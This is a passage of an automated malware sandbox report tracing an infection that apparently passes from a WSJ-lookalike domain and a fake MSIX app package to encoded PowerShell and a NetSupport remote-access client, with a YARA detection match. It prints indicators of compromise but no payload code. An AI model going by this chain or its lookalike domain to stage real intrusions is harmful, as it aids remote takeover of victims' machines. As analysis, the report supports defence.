                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3E726D26_2_00007FF9BB3E726D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3D326C26_2_00007FF9BB3D326C
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3C9A8526_2_00007FF9BB3C9A85
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3C8A9326_2_00007FF9BB3C8A93
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3CBA8E26_2_00007FF9BB3CBA8E
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3CEA8F26_2_00007FF9BB3CEA8F
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3CE92D26_2_00007FF9BB3CE92D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3D894226_2_00007FF9BB3D8942
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3E493B26_2_00007FF9BB3E493B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3C795826_2_00007FF9BB3C7958
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3F38DD26_2_00007FF9BB3F38DD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3CD0E026_2_00007FF9BB3CD0E0
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3D18E026_2_00007FF9BB3D18E0
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3C48EB26_2_00007FF9BB3C48EB
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3E50ED26_2_00007FF9BB3E50ED
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3E58EB26_2_00007FF9BB3E58EB
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3D59C126_2_00007FF9BB3D59C1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3CB1BC26_2_00007FF9BB3CB1BC
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3C71D526_2_00007FF9BB3C71D5
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3E61CD26_2_00007FF9BB3E61CD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3EC9C926_2_00007FF9BB3EC9C9
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3C815A26_2_00007FF9BB3C815A
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3CA97326_2_00007FF9BB3CA973
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3DD17B26_2_00007FF9BB3DD17B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3F481F26_2_00007FF9BB3F481F
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3DC83226_2_00007FF9BB3DC832
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3CC83426_2_00007FF9BB3CC834
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3D402C26_2_00007FF9BB3D402C
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3F17DD26_2_00007FF9BB3F17DD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3F2FDD26_2_00007FF9BB3F2FDD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3C8FF626_2_00007FF9BB3C8FF6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3E5FEA26_2_00007FF9BB3E5FEA
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3C980726_2_00007FF9BB3C9807
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3E480B26_2_00007FF9BB3E480B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3F209D26_2_00007FF9BB3F209D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3F289D26_2_00007FF9BB3F289D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3DD8C426_2_00007FF9BB3DD8C4
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3D28BB26_2_00007FF9BB3D28BB
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3D08CD26_2_00007FF9BB3D08CD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3D48CC26_2_00007FF9BB3D48CC
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3CB86426_2_00007FF9BB3CB864
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3E786926_2_00007FF9BB3E7869
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3C887E26_2_00007FF9BB3C887E
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3E907B26_2_00007FF9BB3E907B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3C587E26_2_00007FF9BB3C587E
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3CE09326_2_00007FF9BB3CE093
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3CEF1D26_2_00007FF9BB3CEF1D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3D373626_2_00007FF9BB3D3736
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3EE72D26_2_00007FF9BB3EE72D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3EEF2D26_2_00007FF9BB3EEF2D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3D673026_2_00007FF9BB3D6730
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3DE74526_2_00007FF9BB3DE745
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3ED6ED26_2_00007FF9BB3ED6ED
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3C5EFB26_2_00007FF9BB3C5EFB
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3D6F1426_2_00007FF9BB3D6F14
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3C7F1026_2_00007FF9BB3C7F10
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3D4F9F26_2_00007FF9BB3D4F9F
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3E6F9926_2_00007FF9BB3E6F99
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3C17B626_2_00007FF9BB3C17B6
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3C6FC126_2_00007FF9BB3C6FC1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3C67CA26_2_00007FF9BB3C67CA
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3CA75E26_2_00007FF9BB3CA75E
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3DDF6026_2_00007FF9BB3DDF60
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3EF75D26_2_00007FF9BB3EF75D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3EFF5D26_2_00007FF9BB3EFF5D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3F0F5D26_2_00007FF9BB3F0F5D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3DCF5F26_2_00007FF9BB3DCF5F
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3E8F5B26_2_00007FF9BB3E8F5B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3DA77126_2_00007FF9BB3DA771
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3CBF6D26_2_00007FF9BB3CBF6D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3EDF8826_2_00007FF9BB3EDF88
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3CF78426_2_00007FF9BB3CF784
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3C4F9426_2_00007FF9BB3C4F94
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3F361D26_2_00007FF9BB3F361D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3E6E1926_2_00007FF9BB3E6E19
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3D561C26_2_00007FF9BB3D561C
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3E5E1B26_2_00007FF9BB3E5E1B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3F062D26_2_00007FF9BB3F062D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3F4E3D26_2_00007FF9BB3F4E3D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3C365426_2_00007FF9BB3C3654
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3E0E4C26_2_00007FF9BB3E0E4C
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3CE5E126_2_00007FF9BB3CE5E1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3EBDF526_2_00007FF9BB3EBDF5
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3D3DFC26_2_00007FF9BB3D3DFC
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3D1EA026_2_00007FF9BB3D1EA0
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3E66AB26_2_00007FF9BB3E66AB
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3CDE6326_2_00007FF9BB3CDE63
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3F265D26_2_00007FF9BB3F265D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3F467526_2_00007FF9BB3F4675
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3DD67426_2_00007FF9BB3DD674
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3CAE8626_2_00007FF9BB3CAE86
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3CD69626_2_00007FF9BB3CD696
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3C1E9726_2_00007FF9BB3C1E97
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3E4E8D26_2_00007FF9BB3E4E8D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3DA52726_2_00007FF9BB3DA527
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3EF51D26_2_00007FF9BB3EF51D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3CA53726_2_00007FF9BB3CA537
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3DDD2A26_2_00007FF9BB3DDD2A
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3DE52926_2_00007FF9BB3DE529
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3CF53B26_2_00007FF9BB3CF53B
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3D955726_2_00007FF9BB3D9557
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3D9CDE26_2_00007FF9BB3D9CDE
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3F0CDD26_2_00007FF9BB3F0CDD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3F14DD26_2_00007FF9BB3F14DD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3E84FD26_2_00007FF9BB3E84FD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3C551226_2_00007FF9BB3C5512
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3C3D1126_2_00007FF9BB3C3D11
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3DBDA126_2_00007FF9BB3DBDA1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3EE59D26_2_00007FF9BB3EE59D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3EED9D26_2_00007FF9BB3EED9D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3F1D9D26_2_00007FF9BB3F1D9D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3F2D9D26_2_00007FF9BB3F2D9D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3C6DB126_2_00007FF9BB3C6DB1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3CFDAA26_2_00007FF9BB3CFDAA
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3EADBD26_2_00007FF9BB3EADBD
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3C95D726_2_00007FF9BB3C95D7
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3EBDCB26_2_00007FF9BB3EBDCB
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3CCD7526_2_00007FF9BB3CCD75
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB3D4D8F26_2_00007FF9BB3D4D8F
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB54647D26_2_00007FF9BB54647D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB541DA126_2_00007FF9BB541DA1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB54659326_2_00007FF9BB546593
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB6C061E26_2_00007FF9BB6C061E
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB6C45E826_2_00007FF9BB6C45E8
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BB6C8CA026_2_00007FF9BB6C8CA0
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BBB093A226_2_00007FF9BBB093A2
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BBB04B9D26_2_00007FF9BBB04B9D
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BBB093C526_2_00007FF9BBB093C5
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BBB01AF126_2_00007FF9BBB01AF1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BBB1A28226_2_00007FF9BBB1A282
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BBB089E126_2_00007FF9BBB089E1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BBB0500726_2_00007FF9BBB05007
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BBB016C026_2_00007FF9BBB016C0
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BBB09E0526_2_00007FF9BBB09E05
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FF9BBB03D2C26_2_00007FF9BBB03D2C
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_1102920032_2_11029200
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_110612D032_2_110612D0
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_110724D032_2_110724D0
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_1102B1F032_2_1102B1F0
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_1115B09032_2_1115B090
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_1106F20032_2_1106F200
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_1107F59032_2_1107F590
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_1115F90032_2_1115F900
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_1101B95032_2_1101B950
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_11163B6532_2_11163B65
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_1101BD9032_2_1101BD90
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_110503E032_2_110503E0
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_1116A6AB32_2_1116A6AB
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_110329A032_2_110329A0
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_1112286032_2_11122860
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_1100887B32_2_1100887B
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_11044B9032_2_11044B90
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_1101CBB032_2_1101CBB0
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_11086D6032_2_11086D60
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_6BEBA98032_2_6BEBA980
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_6BEE491032_2_6BEE4910
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_6BED43C032_2_6BED43C0
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_6BEE415632_2_6BEE4156
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_6BEEA06332_2_6BEEA063
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_6BEE452832_2_6BEE4528
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_6BEC84F032_2_6BEC84F0
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_6BEBDBA032_2_6BEBDBA0
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_6BEE392332_2_6BEE3923
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_6BEE3DB832_2_6BEE3DB8
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_6BEB131032_2_6BEB1310
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_6BEB176032_2_6BEB1760
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_6BEDD70F32_2_6BEDD70F
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: String function: 110290C0 appears 1044 times
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: String function: 6BED9480 appears 53 times
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: String function: 6BEC7C70 appears 35 times
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: String function: 11142790 appears 584 times
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: String function: 6BEC7A90 appears 59 times
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: String function: 111606A0 appears 32 times
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: String function: 11080CC0 appears 44 times
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: String function: 6BEB6F50 appears 161 times
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: String function: 1116B6F0 appears 37 times
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: String function: 6BEB30A0 appears 48 times
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: String function: 6BEC7D00 appears 132 times
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: String function: 110274F0 appears 47 times
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: String function: 1115CAC3 appears 47 times
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: String function: 1105D350 appears 279 times
                                    Source: amsi64_7788.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                                    Source: Process Memory Space: powershell.exe PID: 2564, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                                    Source: Process Memory Space: powershell.exe PID: 7788, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                                    Source: classification engineClassification label: mal100.rans.evad.win@48/139@21/11
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_11059290 GetLastError,FormatMessageA,LocalFree,32_2_11059290
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_1109C580 AdjustTokenPrivileges,FindCloseChangeNotification,32_2_1109C580
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_1109C4F0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,32_2_1109C4F0
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_11095A00 GetTickCount,CoInitialize,CLSIDFromProgID,CoCreateInstance,CoUninitialize,32_2_11095A00
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_110CC3D0 IsWindow,IsWindowVisible,SetForegroundWindow,FindResourceExA,LoadResource,LockResource,DialogBoxIndirectParamA,DialogBoxParamA,32_2_110CC3D0
                                    Source: C:\ProgramData\netsupport\client\client32.exeCode function: 32_2_11124DC0 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,32_2_11124DC0
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2736:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6264:120:WilError_03
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeFile created: C:\Users\user\AppData\Local\Packages\microsoft.desktopappinstaller_8wekyb3d8bbwe\AC\Temp\APPX.h150xbbh9hh9t9qrahcglr31d.tmpJump to behavior
                                    Source: C:\ProgramData\netsupport\client\client32.exeFile read: C:\ProgramData\netsupport\client\client32.ini
                                    Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                    Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://wsj.pm/
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=2012,i,2892533121597599651,11552435548397906284,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                    Source: unknownProcess created: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe "C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe" -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca
                                    Source: unknownProcess created: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe "C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe" /InvokerPRAID: App GroupPolicy
                                    Source: unknownProcess created: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe"
